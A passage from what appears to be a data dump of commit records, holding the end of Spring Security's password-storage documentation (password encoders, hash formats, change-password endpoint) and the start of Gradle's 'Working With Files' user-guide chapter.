Example\n====\n.Java\n[source,java,role=\"primary\",attrs=\"-attributes\"]\n----\nUser user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build();\nSystem.out.println(user.getPassword());\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\",attrs=\"-attributes\"]\n----\nval user = User.withDefaultPasswordEncoder()\n .username(\"user\")\n .password(\"password\")\n .roles(\"user\")\n .build()\nprintln(user.password)\n\/\/ {bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n====\n\nIf you are creating multiple users, you can also reuse the builder.\n\n.withDefaultPasswordEncoder Reusing the Builder\n====\n.Java\n[source,java,role=\"primary\"]\n----\nUserBuilder users = User.withDefaultPasswordEncoder();\nUser user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build();\nUser admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\",\"ADMIN\")\n .build();\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nval users = User.withDefaultPasswordEncoder()\nval user = users\n .username(\"user\")\n .password(\"password\")\n .roles(\"USER\")\n .build()\nval admin = users\n .username(\"admin\")\n .password(\"password\")\n .roles(\"USER\", \"ADMIN\")\n .build()\n----\n====\n\nThis does hash the password that is stored, but the passwords are still exposed in memory and in the compiled source code.\nTherefore, it is still not considered secure for a production environment.\nFor production, you should <<authentication-password-storage-boot-cli,hash your passwords externally>>.\n\n[[authentication-password-storage-boot-cli]]\n=== Encode with Spring Boot CLI\n\nThe easiest way to properly encode your password is to use the https:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/spring-boot-cli.html[Spring Boot CLI].\n\nFor example, the following will encode the password of `password` for use with <<authentication-password-storage-dpe>>:\n\n.Spring Boot CLI encodepassword Example\n====\n[source,attrs=\"-attributes\"]\n----\nspring encodepassword password\n{bcrypt}$2a$10$X5wFBtLrL\/kHcmrOGGTrGufsBX8CJ0WpQpF3pgeuxBB\/H73BK1DW6\n----\n====\n\n[[authentication-password-storage-dpe-troubleshoot]]\n=== Troubleshooting\n\nThe following error occurs when one of the passwords that are stored has no id as described in <<authentication-password-storage-dpe-format>>.\n\n----\njava.lang.IllegalArgumentException: There is no PasswordEncoder mapped for the id \"null\"\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder$UnmappedIdPasswordEncoder.matches(DelegatingPasswordEncoder.java:233)\n\tat org.springframework.security.crypto.password.DelegatingPasswordEncoder.matches(DelegatingPasswordEncoder.java:196)\n----\n\nThe easiest way to resolve the error is to switch to explicitly providing the `PasswordEncoder` that your passwords are encoded with.\nThe easiest way to resolve it is to figure out how your passwords are currently being stored and explicitly provide the correct `PasswordEncoder`.\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by <<authentication-password-storage-configuration,exposing a `NoOpPasswordEncoder` bean>>.\n\nAlternatively, you can prefix all of your passwords with the correct id and continue to use `DelegatingPasswordEncoder`.\nFor example, if you are using BCrypt, you would migrate your password from something like:\n\n----\n$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nto\n\n\n[source,attrs=\"-attributes\"]\n----\n{bcrypt}$2a$10$dXJ3SW6G7P50lGmMkkmwe.20cQQubK3.HZWzG3YB1tlRy.fqvM\/BG\n----\n\nFor a complete listing of the mappings refer to the Javadoc on\nhttps:\/\/docs.spring.io\/spring-security\/site\/docs\/5.0.x\/api\/org\/springframework\/security\/crypto\/factory\/PasswordEncoderFactories.html[PasswordEncoderFactories].\n\n[[authentication-password-storage-bcrypt]]\n== BCryptPasswordEncoder\n\nThe `BCryptPasswordEncoder` implementation uses the widely supported https:\/\/en.wikipedia.org\/wiki\/Bcrypt[bcrypt] algorithm to hash the passwords.\nIn order to make it more resistent to password cracking, bcrypt is deliberately slow.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThe default implementation of `BCryptPasswordEncoder` uses strength 10 as mentioned in the Javadoc of https:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/api\/org\/springframework\/security\/crypto\/bcrypt\/BCryptPasswordEncoder.html[BCryptPasswordEncoder]. You are encouraged to\ntune and test the strength parameter on your own system so that it takes roughly 1 second to verify a password.\n\n.BCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with strength 16\nBCryptPasswordEncoder encoder = new BCryptPasswordEncoder(16);\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with strength 16\nval encoder = BCryptPasswordEncoder(16)\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-argon2]]\n== Argon2PasswordEncoder\n\nThe `Argon2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/Argon2[Argon2] algorithm to hash the passwords.\nArgon2 is the winner of the https:\/\/en.wikipedia.org\/wiki\/Password_Hashing_Competition[Password Hashing Competition].\nIn order to defeat password cracking on custom hardware, Argon2 is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThe current implementation of the `Argon2PasswordEncoder` requires BouncyCastle.\n\n.Argon2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nArgon2PasswordEncoder encoder = new Argon2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Argon2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-pbkdf2]]\n== Pbkdf2PasswordEncoder\n\nThe `Pbkdf2PasswordEncoder` implementation uses the https:\/\/en.wikipedia.org\/wiki\/PBKDF2[PBKDF2] algorithm to hash the passwords.\nIn order to defeat password cracking PBKDF2 is a deliberately slow algorithm.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\nThis algorithm is a good choice when FIPS certification is required.\n\n.Pbkdf2PasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nPbkdf2PasswordEncoder encoder = new Pbkdf2PasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = Pbkdf2PasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-scrypt]]\n== SCryptPasswordEncoder\n\nThe `SCryptPasswordEncoder` implementation uses https:\/\/en.wikipedia.org\/wiki\/Scrypt[scrypt] algorithm to hash the passwords.\nIn order to defeat password cracking on custom hardware scrypt is a deliberately slow algorithm that requires large amounts of memory.\nLike other adaptive one-way functions, it should be tuned to take about 1 second to verify a password on your system.\n\n.SCryptPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n\/\/ Create an encoder with all the defaults\nSCryptPasswordEncoder encoder = new SCryptPasswordEncoder();\nString result = encoder.encode(\"myPassword\");\nassertTrue(encoder.matches(\"myPassword\", result));\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n\/\/ Create an encoder with all the defaults\nval encoder = SCryptPasswordEncoder()\nval result: String = encoder.encode(\"myPassword\")\nassertTrue(encoder.matches(\"myPassword\", result))\n----\n====\n\n[[authentication-password-storage-other]]\n== Other PasswordEncoders\n\nThere are a significant number of other `PasswordEncoder` implementations that exist entirely for backward compatibility.\nThey are all deprecated to indicate that they are no longer considered secure.\nHowever, there are no plans to remove them since it is difficult to migrate existing legacy systems.\n\n[[authentication-password-storage-configuration]]\n== Password Storage Configuration\n\nSpring Security uses <<authentication-password-storage-dpe>> by default.\nHowever, this can be customized by exposing a `PasswordEncoder` as a Spring bean.\n\n\nIf you are migrating from Spring Security 4.2.x you can revert to the previous behavior by exposing a `NoOpPasswordEncoder` bean.\n\n[WARNING]\n====\nReverting to `NoOpPasswordEncoder` is not considered to be secure.\nYou should instead migrate to using `DelegatingPasswordEncoder` to support secure password encoding.\n====\n\n.NoOpPasswordEncoder\n====\n.Java\n[source,java,role=\"primary\"]\n----\n@Bean\npublic static NoOpPasswordEncoder passwordEncoder() {\n return NoOpPasswordEncoder.getInstance();\n}\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<b:bean id=\"passwordEncoder\"\n class=\"org.springframework.security.crypto.password.NoOpPasswordEncoder\" factory-method=\"getInstance\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\n@Bean\nfun passwordEncoder(): PasswordEncoder {\n return NoOpPasswordEncoder.getInstance();\n}\n----\n====\n\n[NOTE]\n====\nXML Configuration requires the `NoOpPasswordEncoder` bean name to be `passwordEncoder`.\n====\n\n[[authentication-change-password-configuration]]\n== Change Password Configuration\n\nMost applications that allow a user to specify a password also require a feature for updating that password.\n\nhttps:\/\/w3c.github.io\/webappsec-change-password-url\/[A Well-Know URL for Changing Passwords] indicates a mechanism by which password managers can discover the password update endpoint for a given application.\n\nYou can configure Spring Security to provide this discovery endpoint.\nFor example, if the change password endpoint in your application is `\/change-password`, then you can configure Spring Security like so:\n\n.Default Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement(Customizer.withDefaults())\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement { }\n}\n----\n====\n\nThen, when a password manager navigates to `\/.well-known\/change-password` then Spring Security will redirect your endpoint, `\/change-password`.\n\nOr, if your endpoint is something other than `\/change-password`, you can also specify that like so:\n\n.Change Password Endpoint\n====\n.Java\n[source,java,role=\"primary\"]\n----\nhttp\n .passwordManagement((management) -> management\n .changePasswordPage(\"\/update-password\")\n )\n----\n\n.XML\n[source,xml,role=\"secondary\"]\n----\n<sec:password-management change-password-page=\"\/update-password\"\/>\n----\n\n.Kotlin\n[source,kotlin,role=\"secondary\"]\n----\nhttp {\n passwordManagement {\n changePasswordPage = \"\/update-password\"\n }\n}\n----\n====\n\nWith the above configuration, when a password manager navigates to `\/.well-known\/change-password`, then Spring Security will redirect to `\/update-password`.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dbd99c0bd84d4d98f046d0157a63665412f113db","subject":"Improve documentation for installing executables with Copy","message":"Improve documentation for installing executables with Copy\n\nCo-authored-by: L\u00f3r\u00e1nt Pint\u00e9r <af37ce1066612ac119d4d429b57f5a7aabf0bdac@gradle.com>","repos":"blindpirate\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle,blindpirate\/gradle,blindpirate\/gradle,gradle\/gradle,gradle\/gradle,gradle\/gradle","old_file":"subprojects\/docs\/src\/docs\/userguide\/authoring-builds\/working_with_files.adoc","new_file":"subprojects\/docs\/src\/docs\/userguide\/authoring-builds\/working_with_files.adoc","new_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[working_with_files]]\n= Working With Files\n\nAlmost every Gradle build interacts with files in some way: think source files, file dependencies, reports and so on. That's why Gradle comes with a comprehensive API that makes it simple to perform the file operations you need.\n\nThe API has two parts to it:\n\n * Specifying which files and directories to process\n * Specifying what to do with them\n\nThe <<#sec:locating_files,File paths in depth>> section covers the first of these in detail, while subsequent sections, like <<#sec:copying_files,File copying in depth>>, cover the second. To begin with, we'll show you examples of the most common scenarios that users encounter.\n\n[[sec:copying_single_file_example]]\n== Copying a single file\n\nYou copy a file by creating an instance of Gradle's builtin link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html[Copy] task and configuring it with the location of the file and where you want to put it. This example mimics copying a generated report into a directory that will be packed into an archive, such as a ZIP or TAR:\n\n.How to copy a single file\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example]\"]\n====\n\nThe link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method is used to create a file or directory path relative to the current project and is a common way to make build scripts work regardless of the project path. The file and directory paths are then used to specify what file to copy using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:from(java.lang.Object++[]++)[Copy.from(java.lang.Object...)] and which directory to copy it to using link:{groovyDslPath}\/org.gradle.api.tasks.Copy.html#org.gradle.api.tasks.Copy:into(java.lang.Object)[Copy.into(java.lang.Object)].\n\nYou can even use the path directly without the `file()` method, as explained early in the section <<#sec:copying_files,File copying in depth>>:\n\n.Using implicit string paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-without-file-method]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-without-file-method]\"]\n====\n\nAlthough hard-coded paths make for simple examples, they also make the build brittle. It's better to use a reliable, single source of truth, such as a task or shared project property. In the following modified example, we use a report task defined elsewhere that has the report's location stored in its `outputFile` property:\n\n.Prefer task\/project properties over hard-coded paths\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-single-file-example-with-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-single-file-example-with-task-properties]\"]\n====\n\nWe have also assumed that the reports will be archived by `archiveReportsTask`, which provides us with the directory that will be archived and hence where we want to put the copies of the reports.\n\n[[sec:copying_multiple_files_example]]\n== Copying multiple files\n\nYou can extend the previous examples to multiple files very easily by providing multiple arguments to `from()`:\n\n.Using multiple arguments with from()\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-example]\"]\n====\n\nTwo files are now copied into the archive directory. You can also use multiple `from()` statements to do the same thing, as shown in the first example of the section <<#sec:copying_files, File copying in depth>>.\n\nNow consider another example: what if you want to copy all the PDFs in a directory without having to specify each one? To do this, attach inclusion and\/or exclusion patterns to the copy specification. Here we use a string pattern to include PDFs only:\n\n.Using a flat filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-flat-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-flat-filter-example]\"]\n====\n\nOne thing to note, as demonstrated in the following diagram, is that only the PDFs that reside directly in the `reports` directory are copied:\n\n.The effect of a flat filter on copying\nimage::copy-with-flat-filter-example.png[]\n\nYou can include files in subdirectories by using an Ant-style glob pattern (`\\**\/*`), as done in this updated example:\n\n.Using a deep filter\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-multiple-files-with-deep-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-multiple-files-with-deep-filter-example]\"]\n====\n\nThis task has the following effect:\n\n.The effect of a deep filter on copying\nimage::copy-with-deep-filter-example.png[]\n\nOne thing to bear in mind is that a deep filter like this has the side effect of copying the directory structure below `reports` as well as the files. If you just want to copy the files without the directory structure, you need to use an explicit `fileTree(_dir_) { _includes_ }.files` expression. We talk more about the difference between file trees and file collections in the <<#sec:file_trees,File trees>> section.\n\nThis is just one of the variations in behavior you're likely to come across when dealing with file operations in Gradle builds. Fortunately, Gradle provides elegant solutions to almost all those use cases. Read the _in-depth_ sections later in the chapter for more detail on how the file operations work in Gradle and what options you have for configuring them.\n\n[[sec:copying_directories_example]]\n== Copying directory hierarchies\n\nYou may have a need to copy not just files, but the directory structure they reside in as well. This is the default behavior when you specify a directory as the `from()` argument, as demonstrated by the following example that copies everything in the `reports` directory, including all its subdirectories, to the destination:\n\n.Copying an entire directory\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-example]\"]\n====\n\nThe key aspect that users struggle with is controlling how much of the directory structure goes to the destination. In the above example, do you get a `toArchive\/reports` directory or does everything in `reports` go straight into `toArchive`? The answer is the latter. If a directory is part of the `from()` path, then it _won't_ appear in the destination.\n\nSo how do you ensure that `reports` itself is copied across, but not any other directory in `$buildDir`? The answer is to add it as an include pattern:\n\n.Copying an entire directory, including itself\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=copy-directory-including-itself-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=copy-directory-including-itself-example]\"]\n====\n\nYou'll get the same behavior as before except with one extra level of directory in the destination, i.e. `toArchive\/reports`.\n\nOne thing to note is how the `include()` directive applies only to the `from()`, whereas the directive in the previous section applied to the whole task.\nThese different levels of granularity in the copy specification allow you to easily handle most requirements that you will come across.\nYou can learn more about this in the section on <<sub:using_child_copy_specifications,child specifications>>.\n\n[[sec:creating_archives_example]]\n== Creating archives (zip, tar, etc.)\n\nFrom the perspective of Gradle, packing files into an archive is effectively a copy in which the destination is the archive file rather than a directory on the file system. This means that creating archives looks a lot like copying, with all of the same features!\n\nThe simplest case involves archiving the entire contents of a directory, which this example demonstrates by creating a ZIP of the `toArchive` directory:\n\n.Archiving a directory as a ZIP\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=create-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=create-archive-example]\"]\n====\n\nNotice how we specify the destination and name of the archive instead of an `into()`: both are required. You often won't see them explicitly set, because most projects apply the <<base_plugin.adoc#base_plugin,Base Plugin>>. It provides some conventional values for those properties. The next example demonstrates this and you can learn more about the conventions in the <<#sec:archive_naming,archive naming>> section.\n\nEach type of archive has its own task type, the most common ones being link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Zip.html[Zip], link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Tar.html[Tar] and link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar]. They all share most of the configuration options of `Copy`, including filtering and renaming.\n\nOne of the most common scenarios involves copying files into specified subdirectories of the archive. For example, let's say you want to package all PDFs into a `docs` directory in the root of the archive. This `docs` directory doesn't exist in the source location, so you have to create it as part of the archive. You do this by adding an `into()` declaration for just the PDFs:\n\n.Using the Base Plugin for its archive name convention\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/groovy\",files=\"build.gradle[tags=create-archive-with-base-plugin-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithBasePlugin\/kotlin\",files=\"build.gradle.kts[tags=create-archive-with-base-plugin-example]\"]\n====\n\nAs you can see, you can have multiple `from()` declarations in a copy specification, each with its own configuration. See <<#sub:using_child_copy_specifications,Using child copy specifications>> for more information on this feature.\n\n[[sec:unpacking_archives_example]]\n== Unpacking archives\n\nArchives are effectively self-contained file systems, so unpacking them is a case of copying the files from that file system onto the local file system \u2014\u00a0or even into another archive.\nGradle enables this by providing some wrapper functions that make archives available as hierarchical collections of files (<<sec:file_trees,file trees>>).\n\nThe two functions of interest are link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] and link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:tarTree(java.lang.Object)[Project.tarTree(java.lang.Object)], which produce a link:{javadocPath}\/org\/gradle\/api\/file\/FileTree.html[FileTree] from a corresponding archive file. That file tree can then be used in a `from()` specification, like so:\n\n.Unpacking a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-example]\"]\n====\n\nAs with a normal copy, you can control which files are unpacked via <<#sec:filtering_files,filters>> and even <<#sec:renaming_files,rename files>> as they are unpacked.\n\nMore advanced processing can be handled by the link:{groovyDslPath}\/org.gradle.api.tasks.AbstractCopyTask.html#eachFile(org.gradle.api.Action)[eachFile()] method. For example, you might need to extract different subtrees of the archive into different paths within the destination directory. The following sample uses the method to extract the files within the archive's `libs` directory into the root destination directory, rather than into a `libs` subdirectory:\n\n.Unpacking a subset of a ZIP file\n====\ninclude::sample[dir=\"snippets\/files\/archives\/groovy\",files=\"build.gradle[tags=unpack-archive-subset-example]\"]\ninclude::sample[dir=\"snippets\/files\/archives\/kotlin\",files=\"build.gradle.kts[tags=unpack-archive-subset-example]\"]\n====\n<1> Extracts only the subset of files that reside in the `libs` directory\n<2> Remaps the path of the extracting files into the destination directory by dropping the `libs` segment from the file path\n<3> Ignores the empty directories resulting from the remapping, see Caution note below\n\n[CAUTION]\n====\nYou can not change the destination path of empty directories with this technique.\nYou can learn more in https:\/\/github.com\/gradle\/gradle\/issues\/2940[this issue].\n====\n\nIf you're a Java developer and are wondering why there is no `jarTree()` method, that's because `zipTree()` works perfectly well for JARs, WARs and EARs.\n\n[[sec:creating_uber_jar_example]]\n== Creating \"uber\" or \"fat\" JARs\n\nIn the Java space, applications and their dependencies typically used to be packaged as separate JARs within a single distribution archive. That still happens, but there is another approach that is now common: placing the classes and resources of the dependencies directly into the application JAR, creating what is known as an uber or fat JAR.\n\nGradle makes this approach easy to accomplish. Consider the aim: to copy the contents of other JAR files into the application JAR. All you need for this is the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:zipTree(java.lang.Object)[Project.zipTree(java.lang.Object)] method and the link:{groovyDslPath}\/org.gradle.api.tasks.bundling.Jar.html[Jar] task, as demonstrated by the `uberJar` task in the following example:\n\n.Creating a Java uber or fat JAR\n====\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/groovy\",files=\"build.gradle[tags=create-uber-jar-example]\"]\ninclude::sample[dir=\"snippets\/files\/archivesWithJavaPlugin\/kotlin\",files=\"build.gradle.kts[tags=create-uber-jar-example]\"]\n====\n\nIn this case, we're taking the runtime dependencies of the project \u2014 `configurations.runtimeClasspath.files` \u2014 and wrapping each of the JAR files with the `zipTree()` method. The result is a collection of ZIP file trees, the contents of which are copied into the uber JAR alongside the application classes.\n\n[[sec:creating_directories_example]]\n== Creating directories\n\nMany tasks need to create directories to store the files they generate, which is why Gradle automatically manages this aspect of tasks when they explicitly define file and directory outputs. You can learn about this feature in the <<more_about_tasks.adoc#sec:up_to_date_checks,incremental build>> section of the user manual. All core Gradle tasks ensure that any output directories they need are created if necessary using this mechanism.\n\nIn cases where you need to create a directory manually, you can use the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:mkdir(java.lang.Object)[Project.mkdir(java.lang.Object)] method from within your build scripts or custom task implementations. Here's a simple example that creates a single `images` directory in the project folder:\n\n.Manually creating a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=mkdir-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=mkdir-example]\"]\n====\n\nAs described in the {antManual}\/Tasks\/mkdir.html[Apache Ant manual], the `mkdir` task will automatically create all necessary directories in the given path and will do nothing if the directory already exists.\n\n[[sec:moving_files_example]]\n== Moving files and directories\n\nGradle has no API for moving files and directories around, but you can use the <<ant.adoc#ant,Apache Ant integration>> to easily do that, as shown in this example:\n\n.Moving a directory using the Ant task\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=move-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=move-example]\"]\n====\n\nThis is not a common requirement and should be used sparingly as you lose information and can easily break a build. It's generally preferable to copy directories and files instead.\n\n[[sec:renaming_files_example]]\n== Renaming files on copy\n\nThe files used and generated by your builds sometimes don't have names that suit, in which case you want to rename those files as you copy them. Gradle allows you to do this as part of a copy specification using the `rename()` configuration.\n\nThe following example removes the \"-staging-\" marker from the names of any files that have it:\n\n.Renaming files as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=rename-on-copy-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=rename-on-copy-example]\"]\n====\n\nYou can use regular expressions for this, as in the above example, or closures that use more complex logic to determine the target filename. For example, the following task truncates filenames:\n\n.Truncating filenames as they are copied\n====\ninclude::sample[dir=\"snippets\/files\/copy\/groovy\",files=\"build.gradle[tags=truncate-names-example]\"]\ninclude::sample[dir=\"snippets\/files\/copy\/kotlin\",files=\"build.gradle.kts[tags=truncate-names-example]\"]\n====\n\nAs with filtering, you can also apply renaming to a subset of files by configuring it as part of a child specification on a `from()`.\n\n[[sec:deleting_files_example]]\n== Deleting files and directories\n\nYou can easily delete files and directories using either the link:{groovyDslPath}\/org.gradle.api.tasks.Delete.html[Delete] task or the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:delete(org.gradle.api.Action)[Project.delete(org.gradle.api.Action)] method.\nIn both cases, you specify which files and directories to delete in a way supported by the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:files(java.lang.Object++[]++)[Project.files(java.lang.Object...)] method.\n\nFor example, the following task deletes the entire contents of a build's output directory:\n\n.Deleting a directory\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-example]\"]\n====\n\nIf you want more control over which files are deleted, you can't use inclusions and exclusions in the same way as for copying files.\nInstead, you have to use the builtin filtering mechanisms of `FileCollection` and `FileTree`.\nThe following example does just that to clear out temporary files from a source directory:\n\n.Deleting files matching a specific pattern\n====\ninclude::sample[dir=\"snippets\/files\/misc\/groovy\",files=\"build.gradle[tags=delete-with-filter-example]\"]\ninclude::sample[dir=\"snippets\/files\/misc\/kotlin\",files=\"build.gradle.kts[tags=delete-with-filter-example]\"]\n====\n\nYou'll learn more about file collections and file trees in the next section.\n\n[[sec:locating_files]]\n== File paths in depth\n\nIn order to perform some action on a file, you need to know where it is, and that's the information provided by file paths. Gradle builds on the standard Java `{javaApi}\/java\/io\/File.html[File]` class, which represents the location of a single file, and provides new APIs for dealing with collections of paths. This section shows you how to use the Gradle APIs to specify file paths for use in tasks and file operations.\n\nBut first, an important note on using hard-coded file paths in your builds.\n\n\n[[sec:hard_coded_file_paths]]\n=== On hard-coded file paths\n\nMany examples in this chapter use hard-coded paths as string literals. This makes them easy to understand, but it's not good practice for real builds. The problem is that paths often change and the more places you need to change them, the more likely you are to miss one and break the build.\n\nWhere possible, you should use tasks, task properties, and <<writing_build_scripts.adoc#sec:extra_properties,project properties>> \u2014 in that order of preference \u2014 to configure file paths. For example, if you were to create a task that packages the compiled classes of a Java application, you should aim for something like this:\n\n.How to minimize the number of hard-coded paths in your build\n====\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/groovy\",files=\"build.gradle[tags=link-task-properties]\"]\ninclude::sample[dir=\"snippets\/files\/sampleJavaProject\/kotlin\",files=\"build.gradle.kts[tags=link-task-properties]\"]\n====\n\nSee how we're using the `compileJava` task as the source of the files to package and we've created a project property `archivesDirPath` to store the location where we put archives, on the basis we're likely to use it elsewhere in the build.\n\nUsing a task directly as an argument like this relies on it having <<more_about_tasks.adoc#sec:task_inputs_outputs,defined outputs>>, so it won't always be possible.\nIn addition, this example could be improved further by relying on the Java plugin's convention for `destinationDirectory` rather than overriding it, but it does demonstrate the use of project properties.\n\n[[sec:single_file_paths]]\n=== Single files and directories\n\nGradle provides the link:{groovyDslPath}\/org.gradle.api.Project.html#org.gradle.api.Project:file(java.lang.Object)[Project.file(java.lang.Object)] method for specifying the location of a single file or directory.\nRelative paths are resolved relative to the project directory, while absolute paths remain unchanged.\n\n[CAUTION]\n====\nNever use `new File(relative path)` because this creates a path relative to the current working directory (CWD). Gradle can make no guarantees about the location of the CWD, which means builds that rely on it may break at any time.\n====\n\nHere are some examples of using the `file()` method with different types of 